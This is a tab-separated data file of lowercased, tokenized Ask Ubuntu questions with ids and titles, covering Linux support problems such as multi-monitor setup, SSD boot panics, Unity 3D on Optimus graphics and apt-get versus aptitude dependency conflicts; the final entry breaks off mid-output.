328395	ubuntu mirroring two monitors but only detecting one	i have an ubuntu 12.04.2 lts install that i want to use two monitors with . the monitors are identical dell u2312hm 23 '' that i am connecting with a vga and a dvi cable to a sapphire radeon hd6450 . after installing the driver from their site , the screen is mirrored to both displays . however , 'displays ' ( under settings ) detects only one screen ( named 'laptop ' ) for which only one , too low resolution is available . is there a way to detect both monitors and their proper resolutions ? i tried some options for aticonfig -âresolution and aticonfig âinitial=dual-head but they do n't seem to have any effect .
328397	thinkpad t60p boots 12.04 & 13.04 from live cd but panics when booting same from ssd	strange problem has me stumped . recently swapped out old hdd for new ssd on my t60p . now ca n't seem to boot off it after installing either 12.04 or 13.04 , but booting from live cd with same those versions is fine . the details : thinkpad t60p running ubuntu 11.10 ( x86_64 ) for quite some time with no problems . fan started going bad , so i swapped that out . do n't think i damaged any hardware in the process . figured i 'd go ahead and swap my old hdd for a new ssd i had sitting around , so i used clonezilla to grab the old 11.10 partition and put it on the new drive ( old hdd had windows partition , too ) . would n't boot . figured i 'd screwed up the clonezilla or maybe grub , so did n't dig into the issue . instead , figured i 'd just install a fresh copy of 13.04 onto the new ssd ( did n't have anything crucial on there and still had the original hdd anyway ) . 13.04 live cd ( well , usb flash drive , created with unetbootin on my mac ) booted fine . installed onto ssd . no errors , so i assume the ssd itself is ok ( it 's a brand new samsung ) . upon booting from ssd , got grub , but then hung on purple screen before ubuntu logo appears . rebooted with `` recovery '' option in grub and saw that it was hanging on `` requesting acpi_cpufreq . '' figured maybe kernel was too new and did n't like old bios . updated thinkpad 's bios to latest . tried to boot again , but got same issue . figured maybe 13.04 kernel had some other issue with my hardware , so tried 12.04 instead . created live cd flash drive . booted fine from usb . installed fine onto ssd . booted from ssd . same ( or similar ) issue . hangs on boot . recovery mode shows kernel hanging on an acpi message ( not the same message , but also about acpi ) . thinking i had maybe screwed up my hardware somehow , tried to boot off the old 11.10 hdd ( via sata-to-usb thingy -- did n't feel like reinstalling the drive internally ) and it booted fine ( well , i got all the way to the gnome login screen , so i assume it was fine ) . so i 'm kinda baffled . nothing at all seems to boot off the ssd , but i do n't get any errors that would lead me to believe the ssd itself has issues . does the live cd not have the same kernel that the `` permanent '' version does ? any ideas ? thanks
328399	what pre-installed apps can i safely delete on xubuntu 13.04 ?	i recently started running xubuntu 13.04 on a netbook . it runs fine , but the hard drive is small , so every megabyte of space counts . what pre-installed applications can i safely delete ? programs i would like to delete include : chromium thunderbird gnuneric abiword rhythmbox gimp mines sudoku transmission pidgin instant messager gmusicbrowser xfburn thanks !
328400	how to change default automount umask on 13.04 ?	when i plug in my usb hdd , ubuntu 13.04 will mount it to /media/myname/label , but the umask is 700 , i try to change it by `` chmod 755 xxxxx '' , but no effect . so , how to change default umask ? btw : my usb hdd is stored some movies , i want to use plex media server to scan them , but pms can not find anything from hdd path , so i think it is a umask issue .
328406	dvd writer not working properly	i am using a sony vaio vpceh15en laptop . i am not able to play any dvd 's on my computer but i am able to play cds . how can i know what the problem is ? is there any software to detect problems on devices for ubuntu ?
328409	what are the alternatives to camtasia studio to edit videos on ubuntu ?	for windows 7 there is a program called camastia studio , which i use to edit videos . i need to edit videos on ubuntu , so i tried to download camastia and install it via wine , but it does n't work . what alternatives do i have for editing videos on ubuntu ? the suggested software should at least include the following options : cutting video adding text to the video zoom while the video is playing transitions should be available
328414	ubuntu touch on nexus 7 3g ( autodeploy.zip not found )	i 've tried to install ubuntu on my nexus 7 3g . i used this link . my tablet wo n't boot with ubuntu , and i 've received in the recovery mod this error message : checking for autodeploy.zip autodeploy.zip not found . i 've used these commands to do it manually : adb push ./saucy-preinstalled-touch-armel+grouper.zip /sdcard/autodeploy.zip adb push ./saucy-preinstalled-touch-armhf.zip /sdcard/autodeploy.zip ... but it did n't help . tell me please , what can i do to install ubuntu ?
328415	ubuntu 13.04 not recognizing windows 8	sorry if this has been posted before , but whenever i go to install ubuntu it always states it is unable to find an operating system on the hard drive , if i choose `` something else '' i see a partition table , but i ca n't edit the partitions . if i choose the `` install '' option it says something along the lines of `` no root file system is defined '' . my computer is a gateway ne56r31u with windows 8 installed .
328418	how to increase power of wifi adapter	how can i increase the tx power of my wifi adapter ? i want to increase it more than the limit ( 15 )
328419	my bittorrent client does n't load by default	i have upgraded from 10.10 to 12.10 . when i click a torrent link , it asks what i want to use , but i 'm not sure where the application is actually located . before it would just load transmission by default . any ideas about what to do ?
328420	chrome / flash problems	i just installed 12.04 lts on my mother 's dell inspiron 660s ( all standard hardware straight from the factory except some extra ram ) . i did this because she hated the windows 8 that came standard on it , and it had become super buggy/corrupt and experienced bsod 's , freezing , and general crashes about three times an hour . the computer is in her kitchen and is used almost exclusively for facebook games and watching amazon and netflix videos , i.e . it needs flash . from all the articles i could find on here ( most of which are over a year old ) , they suggest using chrome or installing/reinstalling flash . i installed chrome , netflix and amazon do n't work at all , but youtube will . i uninstalled then reinstalled flash , i got the restricted repositories or whatever , and have done just about everything i could to try to get flash to work . how do i get flash to work ?
328423	i ca n't log in to ubuntu 13.04	for some reason when i restarted my pc dual-booted with ubuntu 13.04 and windows 8 , whenever i go into ubuntu and i get to the lock screen and i put in my password , it will load , the screen will turn black , and it will go directly back to the lock screen again . this happens every time i do this . i tried using the guest account and when i try to log in with that the same thing happens . it was working just fine before this reboot , and now i ca n't even use ubuntu . please help !
328424	permission denied for driver-select	currently i 'm new to linux . i 'm trying to add in wireless drivers and everytime i try to select my driver i get this ./scripts/driver-select ath9k bash : ./scripts/driver-select : permission denied
328427	running ubuntu on pc- a couple of questions ?	i am currently thinking about buying a new laptop , and i want to buy a pc for its good price to hardware ratio and run ubuntu on it because i do a lot of app and web development work . my questions are : is this a good idea ? how good is the performance of ubuntu compare to native windows 7/8 will the touch screen work for ubuntu if i were to buy a touch screen pc ? what is the true processor speed of the computer with turbo boost ? say if the computer 's base processor is 2.4 ghz but it can be turbo boosted to 3.2 ghz , does that mean the computer 's `` true '' cpu speed is 3.2 ghz ? will the turbo boost technology negatively affect the lifespan of the processor ?
328428	howto prevent gzip from copying files to temp folder	it seems that when i try to compress a file using gzip ( .gz ) , it copies original file to temp directory , compress the copied file in temp , and then move the compressed file from temp to original directory . this process uses so much system resource and also hdd read/write . how can i tell gzip to compress files in their own directory ( just similar to 7zip ) p.s . i checked gzip application in windows , too . it was the same . edit : to be more clear , i 'm using nautilus compress option and i want to set it to compress files in place by default .
328429	ca n't change desktop background xubuntu 13.04	i keep getting this message unable to launch usr/bin/xfdesktop-settings
328432	ubuntu 12.04.2 lts	i am new to all of this linux based os . can i upgrade my ubuntu 12.04.2 lts os to ubuntu 12.10 and if so how do i go about doing that ? i tried going through the update manager but the upgrade tab is not available after all updates are complete .
328437	installed bumblebee ... how do i get unity 3d running on nvidia ?	i installed bumblebee following the instructions on the wiki : https : //wiki.ubuntu.com/bumblebee # installation it is working ! i checked out glxspheres and then optirun glxspheres , and i got 55fps and 133fps respectively . hot . i also got the `` unity 3d '' ubuntu interface working after i installed bumblebee . however , here 's the output of /usr/lib/nux/unity_support_test -p : adityamenon @ jaguar : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) sandybridge mobile x86/mmx/sse2 opengl version string : 3.0 mesa 9.0.3 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes so it appears i 'm still on the intel card for my 3d-effects interface . i 'm sure running on the nvidia card instead would make the experience faster ... how do i do that ? this is my laptop : http : //www.samsung.com/in/support/model/np300v5a-s0cin-techspecs pertinent specs being : processor intel® core™ i7 processor2670qm ( 2.20ghz , 6mb l3 cache ) graphic processor nvidia® geforce® gt 520mx graphics , optimus™ technology main chipset intel hm65 edit : just read this question from the sidebar : can i set my optimus nvidia card to run unity3d with bumblebee ? i did n't think of optirun /usr/lib/nux/unity_support_test -p ... so i did that , and here 's the output : opengl vendor string : nvidia corporation opengl renderer string : geforce gt 520mx/pcie/sse2 opengl version string : 4.2.0 nvidia 304.88 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : no gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no so unfortunately , it says unity 3d is n't supported on this ... the answers on the other question only advise selling this laptop and buying a new one with discrete graphics : d is there any other way ?
328439	how to recover lost drives ?	i installed ubuntu by overwriting windows 7 . i didnt knew it would delete all my hard disk partitions and data . now there is only single drive which has ubuntu installed in it . how to recover my lost drives and data ? please help me .
328444	is afp or samba more secure for external access ?	i 'm running 12.04 lts . the title says it all : is afp or samba more secure for external access ?
328445	why ca n't i write to a file even after 777 permission ?	on my ubuntu server i have apache and php and all that nessory stuffs.. but when i run a php file < ? php if ( ! file_put_contents ( '/var/www/myfiles/folder/data/new_rewrite/531e5c5d1e16c3eae28b1489cd34ccb30 ' , 'qwe ' ) ) echo 'error ' ; else echo 'ok ' ; i got `` error '' always . first i tried sudo chmod -r 775 /data then sudo chmod -r 777 /dir ... ... . or change the owner or group to my apache user ( www-data ) but what ever i do i get the same result again and again.. so i looked on log ! [ sat aug 2013 ] [ error ] [ client 115.187.57.149 ] php warning : file_put_contents ( /var/www/myfiles/folder/data/new_rewrite/531e5c5d1e16c3eae28b1489cd34ccb30 ) : failed to open stream : no such file or directory in /var/www/myfiles/folder/test.php on line 2 i found this.. i did n't get it what is the problem is please help me.. thanks
328450	not able to connect to internet on ubuntu	i have a dual boot on my pc . i can access internet through windows but can not do it through ubuntu . i was able to connect to internet on both osses till some days ago , when my brother reset my router ( or modem , i do n't know ) to factory settings and internet stopped working on both osses . after some tweaking the setting in the dsl setting page in windows ( 192.168.1.1 ) , it started working properly without having to connect manually through the network dialog . but it still is n't working on ubuntu 12.04 . and additionally , i ca n't open the settings page from ubuntu but in windows it opens up perfectly . in ubuntu i tried doing sudo pppoeconf but it said that it can not detect access concentrator on eth0 . please help me connect to the internet in ubuntu
328452	will ubuntu touch apps work in linux / windows / mac ?	i mean , it looks like they 're made with cross-platform technologies , but realistically how much effort would be involved in ( say ) making a windows installer for one ?
328454	how can i install the acme editor/shell/user interface on ubuntu ?	acme is a text editor , development environment and textual-user-interface platform developed by rob pike for the plan 9 operating system . according to its website there are several ways to get acme , including the plan9ports package and the acme-sac stand alone complex . so what 's the easiest way to get acme running on ubuntu ?
328456	how to remove ubuntu 11.10 after it is installed alongside windows	i have installed ubuntu 11.10 alongside windows 7 . now i want to uninstall ubuntu , but i want my windows 7 to be safe , i.e . intact with applications and documents in windows . i have not used wubi , just installed alongside windows . i am a new user . please help me and tell me how to uninstall ubuntu 11.10 while preserving my windows installation .
328459	how to enable unity 3d support in ubuntu 12.04 64 bit virtual box with host windows 7 64 bit ?	i installed ubuntu 12.04 in virtualbox with host windows 7 64 bit both but video is a kind of choppy in both vlc & movie player and ubuntu is running slow , few seconds lagging in every click i do i installed build-essentials , vbox guest additions and vbox extension , enabled 3d acceleration but still unity_support_test results as `` no '' for not software rendered and ubuntu 3d support just as below.. not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no help me in getting 3d support and run ubuntu faster just as normal host os without choppy video . i have seen in my friends system those are enabled without graphics card in virtual box . how could this be achieved in my system ? ?
328460	ubuntu 12.04 glxinfo x error of failed request : badrequest	i have ubuntu 12.04 64bit . there is a problem with glxinfo and i am not able to get it work . i googled lot 's of forums . all the suggestions to remove *-fglrx drivers or to reinstall them do n't work to me : - ( is there any solution ?
328463	ubuntu server disrgards console-setup when rebooting in virtualbox	i found this weird behavior . in virtualbox , ubuntu server 12.04 uses this font : i find that hard to read . now i can run dpkg-reconfigure console-setup fine , and set the font to fixed , then it looks like this : that is also how it looks by default in vmware ; much better in my opinion . interestingly , the boot manager font also looks like that ( i.e . loads correctly ) . dpkg-reconfigure console-setup correctly updates the /etc/default/console-setup file , but after a reboot , all settings are gone . for some reason , it does n't load console-setup . does anyone have an idea where the problem might be ? or better yet , where i could start looking ?
328467	which package/program provides the ctrl+shift+u unicode input utility ?	the title pretty much sums it up : where is this nifty functionality baked in , so i can report any bug i may encounter in it ?
328470	how to upgrade to windows 8 with windows 7 and ubuntu 12.04 lts already there in dual boot settings	i am using a dell inspiron 15r 7520 se laptop which came with windows 7 64-bit home premium . i followed these links to install ubuntu 12.04 lts in dual boot configuration : http : //www.linuxbsdos.com/2012/05/17/how-to-dual-boot-ubuntu-12-04-and-windows-7/ http : //www.linuxbsdos.com/2011/09/18/guide-to-disks-and-disk-partitions-in-linux/ i also used easy bcd so that whenever my laptop would start , the windows boot loader would ask me to choose whether i wanted to boot into windows 7 or ubuntu . worked fine . how do i upgrade to windows 8 in custom install mode where all my windows 7 data will vanish , without affecting ubuntu and the dual boot settings ? i first tried on my own and ended up messing my laptop quite a bit .
328471	ca n't install alongside windows 7 64-bit	i tried to install ubuntu 13.04 alongside my 64-bit windows 7 , but when i used the installation dvd the only option that showed up was to replace windows with it . does anyone know why the option to install alongside my original os does not appear ? it is partitioned into my main drive and a backup drive . i should add that i had ubuntu 12.04 on my machine before , but i had to uninstall it due to being unable to enter text when prompted for a password to install anything . this is the same setup i had before i installed the original ubuntu .
328473	overclocked cpu speed not detected in ubuntu 13.04	i have a stable overclock that i have been running since ubuntu 12.04 . however , after upgrading to 13.04 , the available frequencies only includes up to my stock speed as per : cat /sys/devices/system/cpu/cpu*/cpufreq/scaling_available_frequencies again , the overclock is detected and stable in windows , however . is there anyway to get around this ?
328480	ca n't understand which one is unallocated space in ubuntu installation ?	this might seem a really stupid question . i have windows 8 in my laptop . i am trying to install ubuntu 12.04 alongside it . my hard drive is supposed to have 20gb unallocated space in it to install ubuntu . now i am in the installation phase . and i ca n't seem to find it . now there is a window which says installation type . there are options like dev/sda1 , dev/sda2 dev/sda3 etc . but i ca n't seem to understand which one to select . please help me . and thanks in advance .
328485	why does apt-get install skype easily while aptitude complains about major dependency errors ?	i was trying to install skype on ubuntu 13.04 , from the canonical repositories . with apt-get it worked easily , while aptitude had a huge problem with dependencies and proposed a complicated solution . why is this so ? why does n't aptitude offer whatever apt-get does as a potential solution ? here is the output of both : apt-get install skype : reading package lists ... building dependency tree ... reading state information ... the following extra packages will be installed : gcc-4.7-base : i386 libasound2 libasound2 : i386 libasound2-plugins : i386 libasyncns0 : i386 libaudio2 : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libc6 : i386 libcomerr2 : i386 libcups2 : i386 libdbus-1-3 libdbus-1-3 : i386 libdbusmenu-qt2 : i386 libdrm-intel1 libdrm-intel1 : i386 libdrm-nouveau2 libdrm-nouveau2 : i386 libdrm-radeon1 libdrm-radeon1 : i386 libdrm2 libdrm2 : i386 libexpat1 : i386 libffi6 : i386 libflac8 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgcc1 : i386 libgcrypt11 libgcrypt11 : i386 libgl1-mesa-dri libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 libglapi-mesa : i386 libglib2.0-0 : i386 libgnutls26 libgnutls26 : i386 libgpg-error0 : i386 libgssapi-krb5-2 : i386 libgstreamer-plugins-base0.10-0 : i386 libgstreamer0.10-0 : i386 libice6 : i386 libjack-jackd2-0 : i386 libjbig0 : i386 libjpeg-turbo8 : i386 libjpeg8 : i386 libjson0 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 liblcms1 : i386 libllvm3.2 : i386 liblzma5 : i386 libmng1 : i386 libmysqlclient18 : i386 libogg0 : i386 liborc-0.4-0 : i386 libp11-kit0 : i386 libpciaccess0 : i386 libpcre3 : i386 libpng12-0 : i386 libpulse0 : i386 libqt4-dbus libqt4-dbus : i386 libqt4-declarative libqt4-declarative : i386 libqt4-designer libqt4-help libqt4-network libqt4-network : i386 libqt4-opengl libqt4-opengl : i386 libqt4-script libqt4-script : i386 libqt4-scripttools libqt4-sql libqt4-sql : i386 libqt4-sql-mysql : i386 libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xml libqt4-xml : i386 libqt4-xmlpatterns libqt4-xmlpatterns : i386 libqtcore4 libqtcore4 : i386 libqtgui4 libqtgui4 : i386 libqtwebkit4 : i386 libsamplerate0 : i386 libselinux1 : i386 libsm6 : i386 libsndfile1 : i386 libspeexdsp1 : i386 libsqlite3-0 : i386 libssl1.0.0 libssl1.0.0 : i386 libstdc++6 : i386 libtasn1-3 : i386 libtiff5 libtiff5 : i386 libtxc-dxtn-s2tc0 : i386 libuuid1 : i386 libvorbis0a : i386 libvorbisenc2 : i386 libwrap0 : i386 libx11-6 libx11-6 : i386 libx11-xcb1 libx11-xcb1 : i386 libxau6 : i386 libxcb-dri2-0 libxcb-dri2-0 : i386 libxcb-glx0 libxcb-glx0 : i386 libxcb1 libxcb1 : i386 libxdamage1 : i386 libxdmcp6 : i386 libxext6 libxext6 : i386 libxfixes3 libxfixes3 : i386 libxi6 libxi6 : i386 libxml2 libxml2 : i386 libxrender1 libxrender1 : i386 libxslt1.1 : i386 libxss1 : i386 libxt6 libxt6 : i386 libxv1 libxv1 : i386 libxxf86vm1 libxxf86vm1 : i386 mysql-common qdbus skype-bin : i386 sni-qt : i386 zlib1g : i386 suggested packages : nas : i386 glibc-doc : i386 locales : i386 rng-tools rng-tools : i386 libglide3 libglide3 : i386 gnutls-bin gnutls-bin : i386 krb5-doc : i386 krb5-user : i386 libvisual-0.4-plugins : i386 gstreamer-codec-install : i386 gnome-codec-install : i386 gstreamer0.10-tools : i386 gstreamer0.10-plugins-base : i386 jackd2 : i386 liblcms-utils : i386 pulseaudio : i386 libqt4-declarative-folderlistmodel libqt4-declarative-gestures libqt4-declarative-particles libqt4-declarative-shaders qt4-qmlviewer libqt4-declarative-folderlistmodel : i386 libqt4-declarative-gestures : i386 libqt4-declarative-particles : i386 libqt4-declarative-shaders : i386 qt4-qmlviewer : i386 libqt4-dev libqt4-dev : i386 libthai0 : i386 libicu48 : i386 qt4-qtconfig qt4-qtconfig : i386 recommended packages : libtxc-dxtn0 : i386 xml-core : i386 the following new packages will be installed gcc-4.7-base : i386 libasound2 : i386 libasound2-plugins : i386 libasyncns0 : i386 libaudio2 : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libc6 : i386 libcomerr2 : i386 libcups2 : i386 libdbus-1-3 : i386 libdbusmenu-qt2 : i386 libdrm-intel1 : i386 libdrm-nouveau2 : i386 libdrm-radeon1 : i386 libdrm2 : i386 libexpat1 : i386 libffi6 : i386 libflac8 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgcc1 : i386 libgcrypt11 : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 libglapi-mesa : i386 libglib2.0-0 : i386 libgnutls26 : i386 libgpg-error0 : i386 libgssapi-krb5-2 : i386 libgstreamer-plugins-base0.10-0 : i386 libgstreamer0.10-0 : i386 libice6 : i386 libjack-jackd2-0 : i386 libjbig0 : i386 libjpeg-turbo8 : i386 libjpeg8 : i386 libjson0 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 liblcms1 : i386 libllvm3.2 : i386 liblzma5 : i386 libmng1 : i386 libmysqlclient18 : i386 libogg0 : i386 liborc-0.4-0 : i386 libp11-kit0 : i386 libpciaccess0 : i386 libpcre3 : i386 libpng12-0 : i386 libpulse0 : i386 libqt4-dbus : i386 libqt4-declarative : i386 libqt4-network : i386 libqt4-opengl : i386 libqt4-script : i386 libqt4-sql : i386 libqt4-sql-mysql : i386 libqt4-xml : i386 libqt4-xmlpatterns : i386 libqtcore4 : i386 libqtgui4 : i386 libqtwebkit4 : i386 libsamplerate0 : i386 libselinux1 : i386 libsm6 : i386 libsndfile1 : i386 libspeexdsp1 : i386 libsqlite3-0 : i386 libssl1.0.0 : i386 libstdc++6 : i386 libtasn1-3 : i386 libtiff5 : i386 libtxc-dxtn-s2tc0 : i386 libuuid1 : i386 libvorbis0a : i386 libvorbisenc2 : i386 libwrap0 : i386 libx11-6 : i386 libx11-xcb1 : i386 libxau6 : i386 libxcb-dri2-0 : i386 libxcb-glx0 : i386 libxcb1 : i386 libxdamage1 : i386 libxdmcp6 : i386 libxext6 : i386 libxfixes3 : i386 libxi6 : i386 libxml2 : i386 libxrender1 : i386 libxslt1.1 : i386 libxss1 : i386 libxt6 : i386 libxv1 : i386 libxxf86vm1 : i386 mysql-common skype skype-bin : i386 sni-qt : i386 zlib1g : i386 the following packages will be upgraded : libasound2 libdbus-1-3 libdrm-intel1 libdrm-nouveau2 libdrm-radeon1 libdrm2 libgcrypt11 libgl1-mesa-dri libgnutls26 libqt4-dbus libqt4-declarative libqt4-designer libqt4-help libqt4-network libqt4-opengl libqt4-script libqt4-scripttools libqt4-sql libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libssl1.0.0 libtiff5 libx11-6 libx11-xcb1 libxcb-dri2-0 libxcb-glx0 libxcb1 libxext6 libxfixes3 libxi6 libxml2 libxrender1 libxt6 libxv1 libxxf86vm1 qdbus 41 upgraded , 105 newly installed , 0 to remove and 138 not upgraded . need to get 85.9 mb/89.2 mb of archives . after this operation , 204 mb of additional disk space will be used . do you want to continue [ y/n ] ? aptitude install skype : reading package lists ... building dependency tree ... reading state information ... reading extended state information ... initialising package states ... the following new packages will be installed : gcc-4.7-base : i386 { a } libasound2 : i386 { a } libasound2-plugins : i386 { a } libasyncns0 : i386 { a } libaudio2 : i386 { a } libavahi-client3 : i386 { a } libavahi-common-data : i386 { a } libavahi-common3 : i386 { a } libc6 : i386 { a } libcomerr2 : i386 { a } libcups2 : i386 { a } libdbus-1-3 : i386 { a } libdbusmenu-qt2 : i386 { a } libdrm-intel1 : i386 { a } libdrm-nouveau2 : i386 { a } libdrm-radeon1 : i386 { a } libdrm2 : i386 { a } libexpat1 : i386 { a } libffi6 : i386 { a } libflac8 : i386 { a } libfontconfig1 : i386 { a } libfreetype6 : i386 { a } libgcc1 : i386 { a } libgcrypt11 : i386 { a } libgl1-mesa-dri : i386 { a } libgl1-mesa-glx : i386 { a } libglapi-mesa : i386 { a } libglib2.0-0 : i386 { a } libgnutls26 : i386 { a } libgpg-error0 : i386 { a } libgssapi-krb5-2 : i386 { a } libgstreamer-plugins-base0.10-0 : i386 { a } libgstreamer0.10-0 : i386 { a } libice6 : i386 { a } libjack-jackd2-0 : i386 { a } libjbig0 : i386 { a } libjpeg-turbo8 : i386 { a } libjpeg8 : i386 { a } libjson0 : i386 { a } libk5crypto3 : i386 { a } libkeyutils1 : i386 { a } libkrb5-3 : i386 { a } libkrb5support0 : i386 { a } liblcms1 : i386 { a } libllvm3.2 : i386 { a } liblzma5 : i386 { a } libmng1 : i386 { a } libmysqlclient18 : i386 { a } libogg0 : i386 { a } liborc-0.4-0 : i386 { a } libp11-kit0 : i386 { a } libpciaccess0 : i386 { a } libpcre3 : i386 { a } libpng12-0 : i386 { a } libpulse0 : i386 { a } libqt4-dbus : i386 { a } libqt4-declarative : i386 { a } libqt4-network : i386 { a } libqt4-opengl : i386 { a } libqt4-script : i386 { a } libqt4-sql : i386 { a } libqt4-sql-mysql : i386 { a } libqt4-xml : i386 { a } libqt4-xmlpatterns : i386 { a } libqtcore4 : i386 { a } libqtgui4 : i386 { a } libqtwebkit4 : i386 { a } libsamplerate0 : i386 { a } libselinux1 : i386 { a } libsm6 : i386 { a } libsndfile1 : i386 { a } libspeexdsp1 : i386 { a } libsqlite3-0 : i386 { a } libssl1.0.0 : i386 { a } libstdc++6 : i386 { a } libtasn1-3 : i386 { a } libtiff5 : i386 { a } libtxc-dxtn-s2tc0 : i386 { a } libuuid1 : i386 { a } libvorbis0a : i386 { a } libvorbisenc2 : i386 { a } libwrap0 : i386 { a } libx11-6 : i386 { a } libx11-xcb1 : i386 { a } libxau6 : i386 { a } libxcb-dri2-0 : i386 { a } libxcb-glx0 : i386 { a } libxcb1 : i386 { a } libxdamage1 : i386 { a } libxdmcp6 : i386 { a } libxext6 : i386 { a } libxfixes3 : i386 { a } libxi6 : i386 { a } libxml2 : i386 { a } libxrender1 : i386 { a } libxslt1.1 : i386 { a } libxss1 : i386 { a } libxt6 : i386 { a } libxv1 : i386 { a } libxxf86vm1 : i386 { a } mysql-common { a } skype skype-bin : i386 { a } sni-qt : i386 { a } zlib1g : i386 { a } the following packages will be upgraded : libasound2 libdbus-1-3 libdrm-intel1 libdrm-nouveau2 libdrm-radeon1 libdrm2 libgcrypt11 libgl1-mesa-dri libgnutls26 libqt4-dbus libqt4-declarative libqt4-network libqt4-opengl libqt4-script libqt4-sql libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libssl1.0.0 libtiff5 libx11-6 libx11-xcb1 libxcb-dri2-0 libxcb-glx0 libxcb1 libxext6 libxfixes3 libxi6 libxml2 libxrender1 libxt6 libxv1 libxxf86vm1 qdbus 35 packages upgraded , 105 newly installed , 0 to remove and 144 not upgraded . need to get 81.7 mb/85.0 mb of archives . after unpacking 204 mb will be used . the following packages have unmet dependencies : libqt4-test : depends : libqtcore4 ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . libqt4-designer : depends : libqt4-script ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . depends : libqt4-xml ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . depends : libqtcore4 ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . depends : libqtgui4 ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . libqt4-sql-sqlite : depends : libqt4-sql ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . depends : libqtcore4 ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . libqt4-help : depends : libqt4-network ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . depends : libqt4-sql ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . depends : libqtcore4 ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . depends : libqtgui4 ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . libqt4-svg : depends : libqtcore4 ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . depends : libqtgui4 ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . libqt4-scripttools : depends : libqt4-script ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . depends : libqtcore4 ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . depends : libqtgui4 ( = 4:4.8.4+dfsg-0ubuntu9 ) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed . the following actions will resolve these dependencies : remove the following packages : 1 ) account-plugin-aim 2 ) account-plugin-facebook 3 ) account-plugin-flickr 4 ) account-plugin-generic-oauth 5 ) account-plugin-google 6 ) account-plugin-jabber 7 ) account-plugin-salut 8 ) account-plugin-twitter 9 ) account-plugin-windows-live 10 ) account-plugin-yahoo 11 ) empathy 12 ) friends 13 ) friends-dispatcher 14 ) friends-facebook 15 ) friends-twitter 16 ) gir1.2-signon-1.0 17 ) gnome-control-center-signon 18 ) libaccount-plugin-1.0-0 19 ) libfriends0 20 ) libqt4-designer 21 ) libqt4-help 22 ) libqt4-scripttools 23 ) libqt4-sql-sqlite 24 ) libqt4-svg 25 ) libqt4-test 26 ) libsignon-glib1 27 ) mcp-account-manager-uoa 28 ) nautilus-sendto-empathy 29 ) python-qt4 30 ) shotwell 31 ) signon-plugin-oauth2 32 ) signon-plugin-password 33 ) signon-ui 34 ) signond 35 ) ubuntu-sso-client-qt 36 ) ubuntuone-control-panel-qt 37 ) unity-lens-friends 38 ) unity-lens-photos 39 ) unity-scope-gdrive 40 ) webaccounts-extension-common 41 ) xul-ext-webaccounts leave the following dependencies unresolved : 42 ) mcp-account-manager-uoa recommends gnome-control-center-signon 43 ) mcp-account-manager-uoa recommends account-plugin-aim 44 ) mcp-account-manager-uoa recommends account-plugin-jabber 45 ) mcp-account-manager-uoa recommends account-plugin-google 46 ) mcp-account-manager-uoa recommends account-plugin-facebook 47 ) mcp-account-manager-uoa recommends account-plugin-windows-live 48 ) mcp-account-manager-uoa recommends account-plugin-yahoo 49 ) mcp-account-manager-uoa recommends account-plugin-salut 50 ) ubuntu-desktop recommends empathy 51 ) ubuntu-desktop recommends libqt4-sql-sqlite 52 ) ubuntu-desktop recommends shotwell 53 ) ubuntu-desktop recommends ubuntuone-control-panel-qt 54 ) ubuntu-desktop recommends xul-ext-webaccounts 55 ) unity recommends unity-lens-photos 56 ) unity recommends unity-lens-friends 57 ) unity-lens-files recommends unity-scope-gdrive 58 ) libqt4-sql recommends libqt4-sql-mysql | libqt4-sql-odbc | libqt4-sql-ps accept this solution ? [ y/n/q/ ? ] and in case this helps , aptitude show skype : package : skype state : not 